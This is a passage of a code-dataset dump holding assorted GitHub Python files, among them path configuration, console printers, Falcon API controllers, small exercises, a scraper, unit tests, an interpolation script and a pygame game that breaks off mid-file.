('{DUCKDB_RESOURCES_PATH}', 'duck.db'),\n\n 'GRAFANA_RESOURCES_PATH' : ('{STACK_RESOURCES_PATH}', 'grafana', 'resources'),\n 'GRAFANA_DATASOURCE_PATH' : (\n '{GRAFANA_RESOURCES_PATH}', 'provisioning', 'datasources', 'datasource.yaml'\n ),\n 'GRAFANA_DASHBOARD_PATH' : (\n '{GRAFANA_RESOURCES_PATH}', 'provisioning', 'dashboards', 'dashboard.yaml'\n ),\n 'MOSQUITTO_RESOURCES_PATH' : ('{STACK_RESOURCES_PATH}', 'mosquitto', 'resources'),\n 'MOSQUITTO_CONFIG_PATH' : ('{MOSQUITTO_RESOURCES_PATH}', 'mosquitto.conf'),\n\n 'PORTABLE_CHECK_READLINE_PATH' : ('{SHELL_RESOURCES_PATH}', '.readline_attempted_install'),\n\n 'DAEMON_RESOURCES_PATH' : ('{ROOT_DIR_PATH}', 'jobs'),\n 'LOGS_RESOURCES_PATH' : ('{ROOT_DIR_PATH}', 'logs'),\n}\n\ndef set_root(root: Union[Path, str]):\n \"\"\"Modify the value of `ROOT_DIR_PATH`.\"\"\"\n paths['ROOT_DIR_PATH'] = Path(root).resolve()\n for path_name, path_parts in paths.items():\n if isinstance(path_parts, tuple) and path_parts[0] == '{ROOT_DIR_PATH}':\n globals()[path_name] = __getattr__(path_name)\n\ndef __getattr__(name: str) -> Path:\n if name not in paths:\n if name not in globals():\n raise AttributeError(f\"Could not import '{name}'.\")\n return globals()[name]\n\n if isinstance(paths[name], (list, tuple)) and len(paths[name]) > 0:\n ### recurse through paths to create resource directories.\n parts = []\n for p in paths[name]:\n if str(p).startswith('{') and str(p).endswith('}'):\n parts.append(__getattr__(p[1:-1]))\n else:\n parts.append(p)\n path = Path(os.path.join(*parts))\n else:\n path = Path(paths[name])\n\n ### Create directories or touch files.\n if name.endswith('RESOURCES_PATH') or name == 'CONFIG_DIR_PATH':\n path.mkdir(parents=True, exist_ok=True)\n elif 'FILENAME' in name:\n path = str(path)\n\n return path\n\n","repo_name":"bmeares/Meerschaum","sub_path":"meerschaum/config/_paths.py","file_name":"_paths.py","file_ext":"py","file_size_in_byte":7311,"program_lang":"python","lang":"en","doc_type":"code","stars":110,"dataset":"github-code","pt":"79"}
+{"seq_id":"9542583549","text":"#!/usr/bin/env python\n# encoding: utf-8\n# PYTHON_ARGCOMPLETE_OK\n\n# from __future__ imports must occur at the beginning of the file\nfrom __future__ import unicode_literals\nfrom __future__ import print_function\nfrom __future__ import division\n\nimport sys\nimport time\n\n# unify Python 2 and 3\nif sys.version_info[0] == 3:\n\traw_input = input\n\nfrom . import const\nfrom . import gvar\nfrom .printer_util import (\n\tiswindows, human_speed, human_size, human_time_short)\n\ndef colorstr(msg, fg, bg):\n\tCSI = '\\x1b['\n\tfgs = ''\n\tbgs = ''\n\tif fg >=0 and fg <= 7:\n\t\tfgs = str(fg + 30)\n\n\tif bg >= 0 and bg <=7:\n\t\tbgs = str(bg + 40)\n\n\tcs = ';'.join([fgs, bgs]).strip(';')\n\tif cs:\n\t\treturn CSI + cs + 'm' + msg + CSI + '0m'\n\telse:\n\t\treturn msg\n\ndef pr(msg):\n\tprint(msg)\n\t# we need to flush the output periodically to see the latest status\n\tnow = time.time()\n\tif now - gvar.last_stdout_flush >= const.PrintFlushPeriodInSec:\n\t\tsys.stdout.flush()\n\t\tgvar.last_stdout_flush = now\n\ndef prcolor(msg, fg, bg):\n\tif sys.stdout.isatty() and not iswindows():\n\t\tpr(colorstr(msg, fg, bg))\n\telse:\n\t\tpr(msg)\n\ndef ask(msg, enter = True):\n\tpr(msg)\n\tif enter:\n\t\tpr('Press [Enter] when you are done')\n\treturn raw_input()\n\n# print progress\n# https://stackoverflow.com/questions/3173320/text-progress-bar-in-the-console\ndef pprgr(finish, total, start_time = None, existing = 0,\n\t\tprefix = '', suffix = '', seg = 20):\n\t# we don't want this goes to the log, so we use stderr\n\tif total > 0:\n\t\tsegth = seg * finish // total\n\t\tpercent = 100 * finish // total\n\t\tcurrent_batch_percent = 100 * (finish - existing) // total\n\telse:\n\t\tsegth = seg\n\t\tpercent = 100\n\t\tcurrent_batch_percent = 0\n\n\teta = ''\n\tnow = time.time()\n\tif start_time is not None and current_batch_percent > 5 and finish > 0:\n\t\tfinishf = float(finish) - float(existing)\n\t\ttotalf = float(total)\n\t\tremainf = totalf - float(finish)\n\t\telapsed = now - start_time\n\t\tspeed = human_speed(finishf / elapsed)\n\t\teta = 'ETA: ' + human_time_short(elapsed * remainf / finishf) + \\\n\t\t\t\t' (' + speed + ', ' + \\\n\t\t\t\thuman_time_short(elapsed) + ' gone)'\n\tmsg = '\\r' + prefix + '[' + segth * '=' + (seg - segth) * '_' + ']' + \\\n\t\t\" {}% ({}/{})\".format(percent, human_size(finish, 1), human_size(total, 1)) + \\\n\t\t' ' + eta + suffix\n\t#msg = '\\r' + prefix + '[' + segth * '=' + (seg - segth) * '_' + ']' + \\\n\t#\t\" {}% ({}/{})\".format(percent, human_size(finish), human_size(total)) + \\\n\t#\t' ' + eta + suffix\n\tsys.stderr.write(msg + ' ') # space is used as a clearer\n\tsys.stderr.flush()\n\n","repo_name":"houtianze/bypy","sub_path":"bypy/printer_console.py","file_name":"printer_console.py","file_ext":"py","file_size_in_byte":2479,"program_lang":"python","lang":"en","doc_type":"code","stars":7130,"dataset":"github-code","pt":"79"}
+{"seq_id":"18949580729","text":"import falcon\n\nfrom pomoccore import db\nfrom pomoccore.models import User\nfrom pomoccore.models import Admin\nfrom pomoccore.utils import validators\nfrom pomoccore.utils import response\nfrom pomoccore.utils.errors import APIUnprocessableEntityError\n\n\nclass AdminByUsernameController(object):\n @falcon.before(validators.admin.username_exists)\n def on_get(self, req, resp):\n admin = db.Session.query(User).filter_by(username=req.get_json('username')).one()\n\n data = dict()\n data['admin'] = dict()\n for scope in req.scope:\n try:\n data['admin'][scope] = getattr(admin, scope)\n except AttributeError:\n raise APIUnprocessableEntityError('Invalid scope \\'{0}\\''.format(scope),\n 'Scope is not part of the teacher.')\n\n response.set_successful_response(\n resp, falcon.HTTP_200, 'Ignacio! Where is the damn internal code?',\n 'Successful admin data retrieval', 'Admin data successfully gathered.', data\n )\n\n\nclass AdminController(object):\n @falcon.before(validators.admin.exists)\n def on_get(self, req, resp):\n data = dict()\n data['admin'] = dict()\n if req.get_json('admin_id') == '__all__':\n admins = db.Session.query(User).filter_by(user_type='admin').order_by(User.last_name.asc(),\n User.first_name.asc(),\n User.middle_name.asc(),\n User.id_number.asc()).all()\n\n row_ctr = 0\n for admin in admins:\n data['admin'][row_ctr] = dict()\n for scope in req.scope:\n try:\n if scope == 'birth_date':\n data['admin'][row_ctr][scope] = getattr(admin, scope).strftime('%B %d, %Y')\n else:\n data['admin'][row_ctr][scope] = getattr(admin, scope)\n except AttributeError:\n raise APIUnprocessableEntityError('Invalid scope \\'{0}\\''.format(scope),\n 'Scope is not part of the admin.')\n\n row_ctr += 1\n else:\n admin = db.Session.query(Admin).filter_by(admin_id=req.get_json('admin_id')).one()\n\n data['admin'] = dict()\n for scope in req.scope:\n try:\n data['admin'][scope] = getattr(admin, scope)\n except AttributeError:\n raise APIUnprocessableEntityError('Invalid scope \\'{0}\\''.format(scope),\n 'Scope is not part of the admin.')\n\n response.set_successful_response(\n resp, falcon.HTTP_200, 'Ignacio! Where is the damn internal code?',\n 'Successful admin data retrieval', 'Admin data successfully gathered.', data\n )\n","repo_name":"Pisay127/pomoc-core","sub_path":"pomoccore/controllers/admin_controller.py","file_name":"admin_controller.py","file_ext":"py","file_size_in_byte":3112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"39486011895","text":"# Lucien Lo \nfrom BEvents import BEvents\nfrom BranchBuilder import BranchBuilder\n\nclass MultiBEvents(object):\n def __init__(self, files, trees, maxEvents = -1):\n self.files = files\n self.trees = trees\n total_number_evt = sum([tree.GetEntries() for tree in self.trees])\n self.nEvents = min(total_number_evt, maxEvents) if (maxEvents > -1) else total_number_evt\n\n self.EvtClassDict = {}\n total_sum_entries = 0\n for tree in self.trees:\n total_sum_entries += tree.GetEntries()\n self.EvtClassDict[total_sum_entries] = BEvents(tree)\n self.iEvent = -1\n \n def __getitem__(self, i):\n if i >= self.nEvents:\n self.iEvent = -1\n raise IndexError(\"the index is out of range: \" + str(i))\n self.iEvent = i\n for entries in self.EvtClassDict:\n if self.iEvent < entries: break\n return self.EvtClassDict[entries]\n\n def __iter__(self):\n for self.iEvent in xrange(self.nEvents):\n for entries in self.EvtClassDict:\n if self.iEvent < entries: break\n yield self.EvtClassDict[entries]\n self.iEvent = -1\n","repo_name":"lucien1011/PyNTupleAPI","sub_path":"Events/MultiBEvents.py","file_name":"MultiBEvents.py","file_ext":"py","file_size_in_byte":1198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"42229125945","text":"print(\"======== VENDING MACHINE BERAS ========\\n\")\npil = False\nwhile pil is False:\n print(\"======== Pilih Jenis Beras :\")\n print(\"1. Pandan Wangi (Rp 9.500/kg) \")\n print(\"2. Raja Lele (Rp.10.000/kg)\")\n print(\"3. Setra Ramos (Rp 9.000/kg)\")\n print(\"4. IR 42 (Rp 8.600/kg) \")\n print(\"5. Solok (Rp 9.200/kg) \")\n beras = int(input(\"(1-5): \"))\n if beras == 1:\n bname = \"Pandan Wangi\"\n price = 9500\n pil = True\n elif beras == 2:\n bname = \"Raja Lele\"\n price = 10000\n pil = True\n elif beras == 3:\n bname = \"Setra Ramos\"\n price = 9000\n pil = True\n elif beras == 4:\n bname = \"IR 42\"\n price = 8600\n pil = True\n elif beras == 5:\n bname = \"Solok\"\n price = 9200\n pil = True\n else : \n print(\"Nilai yang anda masukkan salah!\")\n print(\"Silahkan pilih kembali (1-5): \")\n pil = False\nprint(\"Anda memilih beras : \" + bname +\"\\n\")\namt = False\nwhile amt == False:\n print(\"======== Paket beras : \")\n print(\"1. 1 KG\")\n print(\"2. 5 KG\")\n print(\"3.10 KG\")\n amtCat = int(input(\"Paket beras : \")) \n if amtCat == 1:\n tot = price\n pak = \"1Kg\"\n amt = True\n elif amtCat == 2:\n tot = price * 5\n pak = \"5Kg\"\n amt = True\n elif amtCat == 3:\n tot = price * 10\n pak = \"10Kg\"\n amt = True\n else : \n print(\"Pilihan yang anda masukkan salah.\")\n print(\"Coba lagi!\")\n amt = False\nfinalState = False\nwhile finalState == False:\n print(\"\\nRincian belanja: \")\n print(\"Beras : \" + bname )\n print(\"Paket : \" + pak)\n print(\"Total : Rp\" + str(tot)+\"\\n\")\n print (\"Pilih metode pembayaran : \")\n print(\"1. Tunai\")\n print(\"2. E-money \")\n mp = int(input(\"(1/2) : \"))\n if mp == 1:\n kembali = 0\n cash = 0\n while cash < tot:\n cash = int(input(\"Masukkan jumlah uang: Rp.\"))\n kembali = cash - tot \n if cash < tot:\n print(\"Mohon maaf, jumlah uang anda tidak mencukupi\")\n else : finalState = True\n eMoney = False\n elif mp == 2:\n cash = input(\"Masukkan nomor e-money: \")\n eMoney = True\n finalState = True\n else :\n print(\"Pilihan anda salah. Coba lagi!\")\n finalState = False\n\nprint(\"Transaksi berhasil!\")\nprint(\"Rincian belanja: \")\nprint(\"Beras : \" + bname )\nprint(\"Paket : \" + pak)\nprint(\"Total : Rp\" + str(tot)+\"\\n\")\nif eMoney == True:\n sald = 2504000 - tot\n print (\"Sisa saldo anda : Rp.\" + str(sald))\nelse :\n print(\"Bayar : Rp\" + str(cash))\n print(\"Kembali : Rp \" + str(kembali))\n","repo_name":"Rizqirazkafi/kuliah-y2","sub_path":"TBO/vmBeras.py","file_name":"vmBeras.py","file_ext":"py","file_size_in_byte":2699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"43494956383","text":"import requests\nfrom bs4 import BeautifulSoup\n\nurl = 'https://hogangnono.com/search?q=%EA%B2%BD%EA%B8%B0%EB%8F%84%20%EA%B9%80%ED%8F%AC%EC%8B%9C%20%ED%92%8D%EB%AC%B4%EB%8F%99'\nres = requests.get(url)\nres.raise_for_status()\n\nsoup = BeautifulSoup(res.text, 'lxml')\n\n# 해당지역 단지 목록 가져오기\narea_list = soup.find_all('li', attrs={'class', 'apt'})\nprint(area_list)","repo_name":"simbyungki/web_scraping","sub_path":"practice01/bs4_pungmu_hogangnono.py","file_name":"bs4_pungmu_hogangnono.py","file_ext":"py","file_size_in_byte":377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"17042922181","text":"from datetime import date\nano = int(input('Em que ano você nasceu? '))\nhoje = date.today().year\nidade = hoje-ano-1\n\nprint('Você tem {} anos e sua categoria é '.format(idade),end=\"\")\n\nif idade <= 9:\n print('\\033[36mMirim')\nelif idade <= 14:\n print('\\033[32mInfantil')\nelif idade <= 19:\n print('\\033[34mJunior')\nelif idade <= 25:\n print('\\033[035mSênior')\nelif idade > 25:\n print('\\033[31mMaster')\n","repo_name":"Joaoespindola1/Python-aprendizado","sub_path":"Desafios/ex041.py","file_name":"ex041.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"71376751935","text":"import pandas as pd\n\n'''\nObject to preprocess data\n'''\n\ndef read_in_dataset(dataset, data_folder='raw', data_type='csv', verbose=False):\n '''\n Read in dataset (csv format) to pandas dataframe\n\n Keyword Arguments:\n ------------------\n * dataset - string with dataset filename\n * data_folder - string with either raw or processed\n * verbose - True will print intormation about the dataset\n\n Returns:\n --------\n a pandas dataframe\n '''\n if data_type == 'csv':\n df = pd.read_csv('../data/{}/{}'.format(data_folder, dataset))\n elif data_type == 'excel':\n df = pd.read_excel('../data/{}/{}'.format(data_folder, dataset))\n\n if verbose:\n print('\\n{0:-^80}'.format(' Reading in the following dataset: {0}'.format(dataset)))\n print(\"\\n Shape: {0} rows and {1} columns\".format(*df.shape))\n print('\\n{0:-^80}\\n'.format(' It has the following columns '))\n print(df.columns)\n print('\\n{0:-^80}\\n'.format(' The first 5 rows look like this '))\n print(df.head())\n\n return df\n\n\ndef get_num_of_levels(series, sep='>', verbose=False):\n '''\n Get maximum number of category levels\n '''\n max_num_levels = series.str.split(sep).apply(len).max()\n\n if verbose:\n print(\"Max Number of Category Levels: {}\".format(max_num_levels))\n\n return max_num_levels\n\n\ndef flatten_categories(category_series, df=None, drop_col=None, sep='>'):\n '''\n Take in Series with categories in string format and flatten into columns\n\n Keyword Arguments:\n ------------------\n * category_series - series with string of categories\n * df - pandas dataframe\n * drop_col - name of column with nested categories (string)\n * sep - puncuation that separates categories\n\n\n Returns:\n --------\n a pandas dataframe\n '''\n\n num_levels = get_num_of_levels(category_series, sep=sep)\n\n col_labels = ['L' + str(i) for i in range(1, num_levels+1)]\n\n\n category_levels = pd.DataFrame(category_series.str.split(sep).values.tolist(), columns=col_labels)\n category_levels.fillna(value=pd.np.nan, inplace=True)\n\n if df is not None:\n merged_df = pd.merge(df,category_levels, left_index=True, right_index=True).drop(drop_col, axis=1)\n\n return merged_df\n else:\n return category_levels\n\n\ndef search_cons_status(cons_searches, raw_searches):\n '''\n Get status on number of unique search terms\n '''\n\n num_searches = len(raw_searches)\n new_num_searches = len(set(cons_searches))\n\n num_cons = num_searches - new_num_searches\n\n per_reduction = round((num_cons/num_searches)*100,1)\n\n print(f'New Number of Searches: {new_num_searches}')\n print(f'Number of Consolidated Searches: {num_cons}')\n print(f'Percent Reduction: {per_reduction}%')\n","repo_name":"jaime-garvey/hd-decor-case","sub_path":"modules/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"14585690640","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n\"\"\"Unit tests for meaning.py\"\"\"\n\nimport meaning\nimport unittest\n\nclass KnownValues(unittest.TestCase):\n\n knownParserValues = (\n (\"*German: [[wichtig]]\",\n [('de','wichtig','',1,False,'')]\n ),\n (\"*[[Esperanto]]: [[grava]]\",\n [('eo','grava','',1,False,'')]\n ),\n (\"*{{fr}}: [[importante]] {{f}}\",\n [('fr','importante','f',1,False,'')]\n ),\n (\"*Dutch: [[voorbeelden]] ''n, pl'', [[instructies]] {{f}}, {{p}}\",\n [('nl','voorbeelden','n',2,False,''),\n ('nl','instructies', 'f',2,False,'')]\n ),\n (\"*Russian: [[шесток]] ''m'' (shestok)\",\n [('ru','шесток','m',1,False,'shestok')]\n ),\n (\"*Kazakh: сәлем, салам, сәлеметсіздер(respectable)\",\n [('ka','сәлем','',1,False,''),\n ('ka','салам','',1,False,''),\n ('ka','сәлеметсіздер','',1,False,'respectable')]\n ),\n (\"*Chinese(Mandarin):[[你好]](ni3 hao3), [[您好]](''formal'' nin2 hao3)\",\n [('zh','你好','',1,False,'ni3 hao3'),\n ('zh','您好','',1,False,\"''formal'' nin2 hao3\")]\n ),\n (\"*German: [[Lamm]] ''n'' [[:de:Lamm|(de)]]\",\n [('de','Lamm','n',1,False,'')]\n ),\n (\"*Italian: [[pronto#Italian|pronto]]\",\n [('it','pronto','',1,False,'')]\n ),\n )\n\n def testParser(self):\n '''self.term, self.gender, self.number, self.diminutive and remark parsed correctly from Wiki format'''\n for wikiline, results in self.knownParserValues:\n ameaning = meaning.Meaning('en', 'dummy')\n ameaning.parseTranslations(wikiline)\n i=0\n for termlang, thisterm, termgender, termnumber, termisadiminutive, remark in results:\n resultterm = ameaning.translations[termlang]['alltrans'][i]['trans']\n self.assertEqual(resultterm.getTerm(), thisterm)\n self.assertEqual(resultterm.getGender(), termgender)\n self.assertEqual(resultterm.getNumber(), termnumber)\n# self.assertEqual(resultterm.getIsDiminutive(), termisadiminutive)\n self.assertEqual(ameaning.translations[termlang]['alltrans'][i]['remark'], remark)\n i+=1\n\nif __name__ == \"__main__\":\n unittest.main()\n \n","repo_name":"dantman/pywikia","sub_path":"wiktionary/meaningtest.py","file_name":"meaningtest.py","file_ext":"py","file_size_in_byte":2692,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"79"}
+{"seq_id":"72659735615","text":"from Stack import *\n\nclass MyQueue:\n\tdef __init__(self):\n\t\tself.first = None\n\t\tself.last = None\n\t\tself.size = 0\n\t\tself.addItemStack = MyStack()\n\t\tself.removeItemStack = MyStack()\n\t\n\tdef add(self, item):\n\t\tself.addItemStack.push(item)\n\t\tself.size += 1\n\t\tself.last = item\n\n\t\tif self.size == 1:\n\t\t\tself.first = self.last\n\n\n\tdef remove(self):\n\t\t#This is when the first value in queue will change after remove action\n\t\ttopItem = self.peek()\n\t\tself.removeItemStack.pop()\n\t\tself.size -= 1\n\n\t\t#update self.first\n\t\tself.first = self.peek()\n\t\tif self.size <= 1:\n\t\t\tself.last = self.first\n\n\t\treturn topItem\n\n\tdef isEmpty(self):\n\t\treturn True if self.size == 0 else False\n\t\n\tdef peek(self):\n\t\tif self.removeItemStack.isEmpty():\n\t\t\tif self.addItemStack.isEmpty():\n\t\t\t\treturn None\n\t\t\telse:\n\t\t\t\t#pop all the items from addItemStack, push all the items to removeItemStack\n\t\t\t\twhile not self.addItemStack.isEmpty():\n\t\t\t\t\tpopItem = self.addItemStack.pop()\n\t\t\t\t\tself.removeItemStack.push(popItem)\n\n\t\t\t\ttopItem = self.removeItemStack.top\n\t\t\t\treturn topItem\n\t\telse:\n\t\t\ttopItem = self.removeItemStack.top\n\t\t\treturn topItem\n\nif __name__ == \"__main__\":\n\tqstack = MyQueue()\n\tfor i in range(1, 6):\n\t\tqstack.add(i)\n\t\n\tprint(\"first: \", qstack.first)\n\tprint(\"last: \", qstack.last)\n\tprint(\"peek: \", qstack.peek())\n\t\n\tprint(\"remove item: \", qstack.remove())\n\n\tprint(\"first: \", qstack.first)\n\tprint(\"peek: \", qstack.peek())\n\tprint(\"last: \", qstack.last)\n\n\twhile not qstack.isEmpty():\n\t\tprint(qstack.remove())\n\n\tprint(\"after queue is empty: \")\n\tprint(\"first: \", qstack.first)\n\tprint(\"last: \", qstack.last)\n\n\n","repo_name":"becca6223/Tech_Prep","sub_path":"stack_and_queues/QueueViaStacks.py","file_name":"QueueViaStacks.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"38581980904","text":"#!/usr/bin/env python\n\n\"\"\"Interpolate missing values, preserving some amount of variance.\n\nUsage: {PROG} -f field -x field [ input ]\n\n-x field - x axis column (required)\n-f field - y axis column (field to be interpolated - required)\n\nIf given, the input file is used, otherwise sys.stdin. Output is always to\nsys.stdout.\n\nCurrently, all this does is linear interpolation. Variance-preserving\ninterpolation is TBD.\n\n\"\"\"\n\nimport getopt\nimport os\nimport sys\n\nimport numpy as np\nimport pandas as pd\n\nPROG = os.path.split(sys.argv[0])[1]\n\ndef usage(msg=None):\n \"help user\"\n if msg is not None:\n printe(msg)\n printe()\n printe(__doc__.strip().format(**globals()))\n\ndef main():\n \"see __doc__\"\n opts, args = getopt.getopt(sys.argv[1:], \"hf:x:\",\n [\"help\", \"field=\", \"xaxis=\",])\n x_axis = None\n field = None\n for opt, arg in opts:\n if opt in (\"--help\", \"-h\"):\n usage()\n return 0\n if opt in (\"-f\", \"--field\"):\n field = arg\n elif opt in (\"-x\", \"--xaxis\"):\n x_axis = arg\n if field is None or x_axis is None:\n usage(\"-x and -f are both required.\")\n return 1\n\n infile = open(args[0]) if args else sys.stdin\n header = next(infile).strip().split(\",\")\n dtype = {\n field: np.float,\n }\n for col in header:\n if col not in (x_axis, field):\n dtype[col] = str\n frame = pd.read_csv(infile, dtype=dtype, names=header,\n parse_dates=[x_axis])\n frame.index = frame[x_axis]\n field_data = frame[[field]]\n field_data = field_data.resample(\"D\").mean().interpolate()\n del frame[field]\n frame = field_data.join(frame, how=\"outer\")\n del frame[x_axis]\n frame = frame.reset_index()\n frame = frame.replace(np.nan, \"\")\n frame.to_csv(sys.stdout, index=False)\n return 0\n\ndef printe(*args, file=sys.stderr, **kwds):\n \"print, defaultint to stderr for output\"\n return print(*args, file=file, **kwds)\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","repo_name":"smontanaro/csvprogs","sub_path":"csvprogs/src/interp.py","file_name":"interp.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"5195632322","text":"quizes = [\n ['Question 1', ['Ans 1', 'Ans 2', 'Ans 3', 'Ans 4']],\n ['Question 2', ['Ans 1', 'Ans 2', 'Ans 3', 'Ans 4']],\n ['Question 3', ['Ans 1', 'Ans 2', 'Ans 3', 'Ans 4']],\n ['Question 4', ['Ans 1', 'Ans 2', 'Ans 3', 'Ans 4']],\n ['Question 5', ['Ans 1', 'Ans 2', 'Ans 3', 'Ans 4']],\n]\n\nanswers = [1, 2, 2, 3, 4]\n\ndef calculate_score(user_ans):\n score = 0\n for i in range(len(user_ans)):\n if user_ans[i] == answers[i]:\n score += 1\n return score\n\ndef prompt_quiz(quiz):\n print('-'*40)\n print(quiz[0])\n print()\n for i in range(4):\n print('[' + str(i + 1) + '] ' + quiz[1][i]) \n print()\n print('-'*40)\n\ndef play():\n user_ans = [] \n for i in range(len(quizes)):\n prompt_quiz(quizes[i])\n ans = 0\n while ans < 1 or ans > 4:\n try:\n ans = int(input('Your answer: '))\n except ValueError as err:\n pass\n user_ans.append(ans)\n score = calculate_score(user_ans)\n print('Your score is ' + str(score))\n\ndef main():\n while True:\n play()\n answer = input('Play again? (y/n): ')\n if answer != 'y':\n break\nmain()","repo_name":"sorasora46/oreo-piethon","sub_path":"mini_projects/quiz_game/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"6950905578","text":"import sys\ninput = sys.stdin.readline\n\nN, M = map(int, input().split())\ngrid = []\n\ndx = [-1, 0, 1, 0]\ndy = [0, -1, 0, 1]\n\nfor i in range(N):\n temp = list(input().rstrip(\"\\n\"))\n a = []\n for j in temp:\n a.append(int(j))\n grid.append(a)\nprint(grid)\n\n\ndef DFS(x, y, grid, visited, N, M):\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n\n if 0 <= nx < N and 0 <= ny < M and not visited[nx][ny] and grid[nx][ny] == 0:\n visited[nx][ny] = True\n DFS(nx, ny, grid, visited, N, M)\n\n\nvisited = [[False for _ in range(M)] for _ in range(N)]\nanswer = 0\nfor i in range(N):\n for j in range(M):\n if grid[i][j] == 0 and not visited[i][j]:\n answer += 1\n DFS(i, j, grid, visited, N, M)\n\nprint(answer)\n","repo_name":"TypingOK/algorithm_study","sub_path":"이것이 취업을 위한 코딩테스트다/음료수 얼려 먹기.py","file_name":"음료수 얼려 먹기.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"34477896247","text":"from shutil import copyfile\nimport os\n\n\ndef create_directory(dir_name):\n try:\n os.makedirs(dir_name)\n except OSError:\n if not os.path.isdir(dir_name):\n raise\n\n\ndef read_compile(lines, file):\n with open(file) as problem1_file:\n append_lines = [line for line in problem1_file]\n append_lines = append_lines[2:]\n\n # Generate submission file for Problem1.py\n with open('submission/%s' % file, 'w') as combined_file:\n [combined_file.write(line) for line in lines]\n [combined_file.write(append_line) for append_line in append_lines]\n\n\nif __name__ == '__main__':\n create_directory('submission')\n\n # Combine decryptRC4 with Problem1 and Problem2\n with open('decryptRC4.py') as main_file:\n lines = [line for line in main_file]\n\n # remove lines after \"\"if __name__ == '__main__':\"\"\n lines = lines[:177]\n\n read_compile(lines, 'Problem1.py')\n read_compile(lines, 'Problem2.py')\n\n # Copy the generated results\n copyfile(\"Problem1.txt\", \"submission/Problem1.txt\")\n copyfile(\"Problem2.txt\", \"submission/Problem2.txt\")\n","repo_name":"Andyccs/CZ4024AttackRC4","sub_path":"generate_submission.py","file_name":"generate_submission.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"}
+{"seq_id":"71856164416","text":"import random\r\nimport pygame.display\r\nimport pygame.font\r\nimport pygame.image\r\nimport pygame.mixer\r\nimport pygame.sprite\r\nfrom sprites import *\r\n\r\n\r\nclass Game:\r\n def __init__(self):\r\n # initialize game window, etc.\r\n pyg.init()\r\n pyg.mixer.init()\r\n self.screen = pyg.display.set_mode((WIDTH, HEIGHT))\r\n pyg.display.set_caption(TITTLE)\r\n self.clock = pyg.time.Clock()\r\n self.running = True\r\n self.font_name_1 = pyg.font.match_font(\"verdana\")\r\n self.font_name_2 = pyg.font.match_font(\"georgia\")\r\n self.load_data()\r\n\r\n def load_data(self):\r\n self.dir = path.dirname(__file__)\r\n self.img_dir = path.join(self.dir, \"Jumper_Data\")\r\n with open(path.join(self.dir, HS_FILE), \"r\") as f:\r\n try:\r\n self.highscore = int(f.read())\r\n except:\r\n self.highscore = 0\r\n\r\n # load spritesheet image\r\n self.spritesheet = Spritesheet(path.join(self.img_dir, SPRITESHEET))\r\n\r\n # Cloud images\r\n self.cloud_images = []\r\n for i in range(1, 4):\r\n self.cloud_images.append(pyg.image.load(path.join(self.img_dir, f\"cloud{i}.png\".format(i))).convert())\r\n\r\n # load sound\r\n self.snd_dir = path.join(self.dir, \"Game_Sound\")\r\n self.jump_sound = pygame.mixer.Sound(path.join(self.snd_dir, 'Jump10.wav'))\r\n self.boost_sound = pygame.mixer.Sound(path.join(self.snd_dir, 'Powerup7.wav'))\r\n\r\n\r\n\r\n def new(self):\r\n # Starts a new game\r\n self.score = 0\r\n self.all_sprites = pyg.sprite.Group()\r\n self.platforms = pyg.sprite.Group()\r\n self.powerups = pyg.sprite.Group()\r\n self.mobs = pyg.sprite.Group()\r\n self.clouds = pyg.sprite.Group()\r\n self.mob = Mob(self)\r\n self.player = Player(self)\r\n for plat in PLAYER_LIST:\r\n Platform(self, *plat)\r\n self.mob_timer = 0\r\n pyg.mixer.music.load(path.join(self.snd_dir, 'Happy Tune.wav'))\r\n self.run()\r\n\r\n def run(self):\r\n # Game loop\r\n pyg.mixer.music.play(loops = -1)\r\n self.playing = True\r\n while self.playing:\r\n # this confirms that the loop have completed under 0.03 second\r\n # And if it had completed before 0.3 second then it will wait till the times up and then run next loop\r\n # so that it will run at the same speed\r\n self.clock.tick(FPS)\r\n # Processing input (events)\r\n self.events()\r\n # To update the sprites after meeting a certain condition\r\n self.update()\r\n # Draw / Render\r\n self.draw()\r\n pyg.mixer.music.fadeout(500)\r\n\r\n def update(self):\r\n # Game loop - update\r\n # To update the sprites after meeting a certain condition in the next frame\r\n self.all_sprites.update()\r\n\r\n # spqwn a mob\r\n now = pyg.time.get_ticks()\r\n if now - self.mob_timer > 10000 + random.choice([-1000, -500, 0, 500, 1000]):\r\n self.mob_timer = now\r\n Mob(self)\r\n\r\n # hit mobs?\r\n # If hit mobs game will end\r\n # For pixel perfect collision we are using pygame_mask function\r\n mob_hits = pyg.sprite.spritecollide(self.player, self.mobs, False, pyg.sprite.collide_mask)\r\n if mob_hits:\r\n self.playing = False\r\n\r\n # check if player hits a platform - only if falling\r\n if self.player.vel.y > 0:\r\n hits = pyg.sprite.spritecollide(self.player, self.platforms, False)\r\n if hits:\r\n lowest_plat = hits[0]\r\n # Collecting the lowest platform in the collision.\r\n # If collision is happening with more than one platform\r\n for hit in hits:\r\n if hit.rect.bottom > 